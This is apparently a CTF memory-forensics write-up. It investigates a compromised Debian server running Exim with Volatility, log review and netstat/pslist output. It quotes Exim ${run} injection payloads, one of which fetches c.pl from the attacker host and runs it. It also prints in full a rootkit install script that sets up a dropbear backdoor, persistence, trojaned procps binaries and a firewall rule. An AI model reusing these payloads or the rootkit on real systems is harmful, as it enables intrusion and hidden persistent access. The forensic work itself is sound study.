Ulysses - Memory Image Forensics

The attacker was performing a Brute Force attack. What account triggered the alert?

- Open victoria-v8.sda1.img in access data view /var/auth.log
- You will see answer

How many were failed attempts there?

- You need to count "failed password" in log file

What kind of system runs on the targeted server?

- The hint said, Google "Identify Linux system"
- /etc/issue

What is the victim's IP address?

$ python volatility/vol.py -f victoria-v8.memdump.img --profile=LinuxDebian5_26x86 linux_netstat
UNIX 2190                 udevd/776   
UDP      0.0.0.0         :  111 0.0.0.0         :    0                           portmap/1429 
TCP      0.0.0.0         :  111 0.0.0.0         :    0 LISTEN                    portmap/1429 
UDP      0.0.0.0         :  769 0.0.0.0         :    0                         rpc.statd/1441 
UDP      0.0.0.0         :38921 0.0.0.0         :    0                         rpc.statd/1441 
TCP      0.0.0.0         :39296 0.0.0.0         :    0 LISTEN                  rpc.statd/1441 
UDP      0.0.0.0         :   68 0.0.0.0         :    0                         dhclient3/1624 
UNIX 5069             dhclient3/1624  
UNIX 4617              rsyslogd/1661  /dev/log
UNIX 4636                 acpid/1672  /var/run/acpid.socket
UNIX 4638                 acpid/1672  
TCP      ::              :   22 ::              :    0 LISTEN                       sshd/1687 
TCP      0.0.0.0         :   22 0.0.0.0         :    0 LISTEN                       sshd/1687 
TCP      ::              :   25 ::              :    0 LISTEN                      exim4/1942 
TCP      0.0.0.0         :   25 0.0.0.0         :    0 LISTEN                      exim4/1942 
UNIX 5132                 login/1990  
TCP      192.168.56.102  :43327 192.168.56.1    : 4444 ESTABLISHED                    sh/2065 
TCP      192.168.56.102  :43327 192.168.56.1    : 4444 ESTABLISHED                    sh/2065 
TCP      192.168.56.102  :43327 192.168.56.1    : 4444 ESTABLISHED                    sh/2065 
TCP      192.168.56.102  :   25 192.168.56.101  :37202 CLOSE                          sh/2065 
TCP      192.168.56.102  :   25 192.168.56.101  :37202 CLOSE                          sh/2065 
TCP      192.168.56.102  :56955 192.168.56.1    : 8888 ESTABLISHED                    nc/2169 

192.168.56.102

What are the attacker's two IP addresses? Format: comma-separated in ascending order

$ python volatility/vol.py -f victoria-v8.memdump.img --profile=LinuxDebian5_26x86 linux_netstat
UNIX 2190                 udevd/776   
UDP      0.0.0.0         :  111 0.0.0.0         :    0                           portmap/1429 
TCP      0.0.0.0         :  111 0.0.0.0         :    0 LISTEN                    portmap/1429 
UDP      0.0.0.0         :  769 0.0.0.0         :    0                         rpc.statd/1441 
UDP      0.0.0.0         :38921 0.0.0.0         :    0                         rpc.statd/1441 
TCP      0.0.0.0         :39296 0.0.0.0         :    0 LISTEN                  rpc.statd/1441 
UDP      0.0.0.0         :   68 0.0.0.0         :    0                         dhclient3/1624 
UNIX 5069             dhclient3/1624  
UNIX 4617              rsyslogd/1661  /dev/log
UNIX 4636                 acpid/1672  /var/run/acpid.socket
UNIX 4638                 acpid/1672  
TCP      ::              :   22 ::              :    0 LISTEN                       sshd/1687 
TCP      0.0.0.0         :   22 0.0.0.0         :    0 LISTEN                       sshd/1687 
TCP      ::              :   25 ::              :    0 LISTEN                      exim4/1942 
TCP      0.0.0.0         :   25 0.0.0.0         :    0 LISTEN                      exim4/1942 
UNIX 5132                 login/1990  
TCP      192.168.56.102  :43327 192.168.56.1    : 4444 ESTABLISHED                    sh/2065 
TCP      192.168.56.102  :43327 192.168.56.1    : 4444 ESTABLISHED                    sh/2065 
TCP      192.168.56.102  :43327 192.168.56.1    : 4444 ESTABLISHED                    sh/2065 
TCP      192.168.56.102  :   25 192.168.56.101  :37202 CLOSE                          sh/2065 
TCP      192.168.56.102  :   25 192.168.56.101  :37202 CLOSE                          sh/2065 
TCP      192.168.56.102  :56955 192.168.56.1    : 8888 ESTABLISHED                    nc/2169 

192.168.56.1,192.168.56.101

What is the "nc" service PID number that was running on the server?

$ python volatility/vol.py -f victoria-v8.memdump.img --profile=LinuxDebian5_26x86 linux_pslist
Offset     Name                 Pid             PPid            Uid             Gid    DTB        Start Time
---------- -------------------- --------------- --------------- --------------- ------ ---------- ----------
0xcf42f900 init                 1               0               0               0      0x0f4b8000 2011-02-06 12:04:09 UTC+0000
0xcf42f4e0 kthreadd             2               0               0               0      ---------- 2011-02-06 12:04:09 UTC+0000
0xcf42f0c0 migration/0          3               2               0               0      ---------- 2011-02-06 12:04:09 UTC+0000
0xcf42eca0 ksoftirqd/0          4               2               0               0      ---------- 2011-02-06 12:04:09 UTC+0000
0xcf42e880 watchdog/0           5               2               0               0      ---------- 2011-02-06 12:04:09 UTC+0000
0xcf42e460 events/0             6               2               0               0      ---------- 2011-02-06 12:04:09 UTC+0000
0xcf42e040 khelper              7               2               0               0      ---------- 2011-02-06 12:04:09 UTC+0000
0xcf4a1a40 kblockd/0            39              2               0               0      ---------- 2011-02-06 12:04:09 UTC+0000
0xcf4a1200 kacpid               41              2               0               0      ---------- 2011-02-06 12:04:09 UTC+0000
0xcf45d140 kacpi_notify         42              2               0               0      ---------- 2011-02-06 12:04:09 UTC+0000
0xcf46c940 kseriod              86              2               0               0      ---------- 2011-02-06 12:04:09 UTC+0000
0xcf43f100 pdflush              123             2               0               0      ---------- 2011-02-06 12:04:10 UTC+0000
0xcf45d980 pdflush              124             2               0               0      ---------- 2011-02-06 12:04:10 UTC+0000
0xcf45d560 kswapd0              125             2               0               0      ---------- 2011-02-06 12:04:10 UTC+0000
0xcf43f520 aio/0                126             2               0               0      ---------- 2011-02-06 12:04:10 UTC+0000
0xcf45c4e0 ksuspend_usbd        581             2               0               0      ---------- 2011-02-06 12:04:14 UTC+0000
0xcf48d1c0 khubd                582             2               0               0      ---------- 2011-02-06 12:04:14 UTC+0000
0xcf46d9c0 ata/0                594             2               0               0      ---------- 2011-02-06 12:04:15 UTC+0000
0xcf802a00 ata_aux              595             2               0               0      ---------- 2011-02-06 12:04:15 UTC+0000
0xcf43e080 scsi_eh_0            634             2               0               0      ---------- 2011-02-06 12:04:17 UTC+0000
0xcf45c0c0 kjournald            700             2               0               0      ---------- 2011-02-06 12:04:18 UTC+0000
0xcf46d5a0 udevd                776             1               0               0      0x0f5b2000 2011-02-06 12:04:21 UTC+0000
0xce978620 kpsmoused            1110            2               0               0      ---------- 2011-02-06 12:04:27 UTC+0000
0xce9796a0 portmap              1429            1               1               1      0x0eddf000 2011-02-06 12:04:35 UTC+0000
0xce973b00 rpc.statd            1441            1               102             0      0x0f8b3000 2011-02-06 12:04:35 UTC+0000
0xcf45c900 dhclient3            1624            1               0               0      0x0ec3d000 2011-02-06 12:04:39 UTC+0000
0xce972660 rsyslogd             1661            1               0               0      0x0e7ed000 2011-02-06 12:04:40 UTC+0000
0xcf43ece0 acpid                1672            1               0               0      0x0f8a8000 2011-02-06 12:04:40 UTC+0000
0xce979ac0 sshd                 1687            1               0               0      0x0fa65000 2011-02-06 12:04:41 UTC+0000
0xcf45cd20 exim4                1942            1               101             103    0x0e7bc000 2011-02-06 12:04:44 UTC+0000
0xcf803a80 cron                 1973            1               0               0      0x0f815000 2011-02-06 12:04:45 UTC+0000
0xcfaad720 login                1990            1               0               0      0x0eecf000 2011-02-06 12:04:45 UTC+0000
0xcf48c560 getty                1992            1               0               0      0x0ea31000 2011-02-06 12:04:45 UTC+0000
0xcf803240 getty                1994            1               0               0      0x0f671000 2011-02-06 12:04:45 UTC+0000
0xcf4a1620 getty                1996            1               0               0      0x0f838000 2011-02-06 12:04:45 UTC+0000
0xcf46cd60 getty                1998            1               0               0      0x0f83d000 2011-02-06 12:04:45 UTC+0000
0xcf4a0180 getty                2000            1               0               0      0x0e89e000 2011-02-06 12:04:45 UTC+0000
0xcf8021c0 bash                 2042            1990            0               0      0x0eecc000 2011-02-06 14:04:38 UTC+0000
0xcfaacee0 sh                   2065            1               0               0      0x0f517000 2011-02-06 14:07:15 UTC+0000
0xcfaac280 memdump              2168            2042            0               0      0x08088000 2011-02-06 14:42:27 UTC+0000
0xcf43e8c0 nc                   2169            2042            0               0      0x08084000 2011-02-06 14:42:27 UTC+0000

What service was exploited to gain access to the system?

# You can see log in /var/log/exim4
$ python volatility/vol.py -f victoria-v8.memdump.img --profile=LinuxDebian5_26x86 linux_pslist
exim4

What is the CVE number of exploited vulnerability?

# Hint said me 'Check logs carefully, then use your Google-fu'. I found string 'smtp' contain mainlog. So I googled 'exim4 CVE'. And filtered 'smtp'.

During this attack, the attacker downloaded two files to the server. What are they?

# look carefully on rejectlog
${run{/bin/sh -c "exec /bin/sh -c 'rm /tmp/rk.tar; sleep 1000'"}}
${run{/bin/sh -c "exec /bin/sh -c 'wget http://192.168.56.1/c.pl -O /tmp/c.pl;perl /tmp/c.pl ; sleep 1000000'"}}
c.pl,rk.tar

What are the two port numbers involved in the process of data exfiltration? Format: comma-separated in ascending order

$ python volatility/vol.py -f victoria-v8.memdump.img --profile=LinuxDebian5_26x86 linux_netstat
UNIX 2190                 udevd/776   
UDP      0.0.0.0         :  111 0.0.0.0         :    0                           portmap/1429 
TCP      0.0.0.0         :  111 0.0.0.0         :    0 LISTEN                    portmap/1429 
UDP      0.0.0.0         :  769 0.0.0.0         :    0                         rpc.statd/1441 
UDP      0.0.0.0         :38921 0.0.0.0         :    0                         rpc.statd/1441 
TCP      0.0.0.0         :39296 0.0.0.0         :    0 LISTEN                  rpc.statd/1441 
UDP      0.0.0.0         :   68 0.0.0.0         :    0                         dhclient3/1624 
UNIX 5069             dhclient3/1624  
UNIX 4617              rsyslogd/1661  /dev/log
UNIX 4636                 acpid/1672  /var/run/acpid.socket
UNIX 4638                 acpid/1672  
TCP      ::              :   22 ::              :    0 LISTEN                       sshd/1687 
TCP      0.0.0.0         :   22 0.0.0.0         :    0 LISTEN                       sshd/1687 
TCP      ::              :   25 ::              :    0 LISTEN                      exim4/1942 
TCP      0.0.0.0         :   25 0.0.0.0         :    0 LISTEN                      exim4/1942 
UNIX 5132                 login/1990  
TCP      192.168.56.102  :43327 192.168.56.1    : 4444 ESTABLISHED                    sh/2065 
TCP      192.168.56.102  :43327 192.168.56.1    : 4444 ESTABLISHED                    sh/2065 
TCP      192.168.56.102  :43327 192.168.56.1    : 4444 ESTABLISHED                    sh/2065 
TCP      192.168.56.102  :   25 192.168.56.101  :37202 CLOSE                          sh/2065 
TCP      192.168.56.102  :   25 192.168.56.101  :37202 CLOSE                          sh/2065 
TCP      192.168.56.102  :56955 192.168.56.1    : 8888 ESTABLISHED                    nc/2169 
4444,8888

Which port did the attacker try to block on the firewall?

# By viewing this log '${run{/bin/sh -c "exec /bin/sh -c 'rm /tmp/rk.tar; sleep 1000'"}}', we can know the tar file can remain in tmp file
# let's dump tar file from access data.
$ mv Untitled0 lol.tar
$ tar -xvf lol.tar
$ cd rk
$ cat install.sh
#!/bin/bash
IFS='
'
umask 0022
if [ ! -f vars.sh ]
then
    echo "Can't find vars.sh, exiting"
    exit
fi
source vars.sh
mkdir -p $rk_home_dir
cp dropbear $rk_home_dir
chmod +x $rk_home_dir/dropbear
chattr +ia $rk_home_dir/dropbear
cp busybox $rk_home_dir
chmod +x $rk_home_dir/busybox
chattr +ia $rk_home_dir/busybox
cp mig $rk_home_dir
chattr +ia $rk_home_dir/mig


if [ -x /etc/init.d/boot.local ]
then
    echo "autostart in /etc/init.d/boot.local"
    echo "$rk_home_dir/dropbear " >> /etc/init.d/boot.local
    echo "/usr/sbin/iptables -I OUTPUT 1 -p tcp --dport 45295 -j DROP" >> /etc/init.d/boot.local
fi


if [ -x /etc/rc.d/rc.local ]
then
    echo "autostart in /etc/rc.d/rc.local"
    echo  "$rk_home_dir/dropbear">> /etc/rc.d/rc.local
    echo "/usr/sbin/iptables -I OUTPUT 1 -p tcp --dport 45295 -j DROP" >> /etc/rc.d/rc.local
fi

dtest=`which update-rc.d`
if [ ! -z $dtest ]
then
    echo "debian like system"
    echo "$rk_home_dir/dropbear " >> /etc/init.d/xfs3
    echo "/usr/sbin/iptables -I OUTPUT 1 -p tcp --dport 45295 -j DROP" >> /etc/init.d/xfs3
    chmod +x /etc/init.d/xfs3
    update-rc.d xfs3 defaults
fi

$rk_home_dir/dropbear

#################################### procps
for l in `ls procps`
do
    o=`which $l`
    if [ ! -z $o ]
    then
    chattr -ia $o
    rm -f $o
    cp procps/$l $o
    chattr +ia $o
    fi
done
mkdir -p /usr/include/mysql
echo dropbear >> /usr/include/mysql/mysql.hh1
if [ -f /sbin/ttymon ]
then
    echo "WARNING: SHV5/SHV4 RK DETECTED"
    chattr -ia /sbin/ttymon /sbin/ttyload
    rm -f /sbin/ttymon /sbin/ttyload
    kill -9 `pidof ttymon`
    kill -9 `pidof ttyload`
fi
iptables -I OUTPUT 1 -p tcp --dport 45295 -j DROP
echo 
echo 
echo 
echo "Don't forget to:"
echo "cd .."
echo "rm -rf rk rk.tbz2"

PreviousDumpMe - Memory Image Forensics NextLog Analysis

Last updated 4 years ago